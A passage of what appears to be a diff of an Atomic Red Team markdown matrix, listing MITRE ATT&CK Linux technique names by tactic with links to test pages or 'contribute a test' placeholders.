[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication 
[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | [Cron](../../T1053.003/T1053.003.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Unix Shell](../../T1059.004/T1059.004.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | -| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Keylogging](../../T1056.001/T1056.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource 
Hijacking](../../T1496/T1496.md) | -| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) 
| [File Deletion](../../T1070.004/T1070.004.md) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Trap](../../T1546.005/T1546.005.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | -| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | [Local Account](../../T1136.001/T1136.001.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | 
[Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | -| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | 
Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | | -| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | -| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Account Manipulation [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | Add-ins [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | +| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [At (Linux)](../../T1053.001/T1053.001.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 
Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) | +| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deploy Container [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery 
[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
| Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object 
[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Escape to Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | [Local Account](../../T1087.001/T1087.001.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Python](../../T1059.006/T1059.006.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deploy Container [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 
Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Disable or Modify Cloud Firewall [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | [Systemd Timers](../../T1053.006/T1053.006.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Keylogging](../../T1056.001/T1056.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | +| | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | 
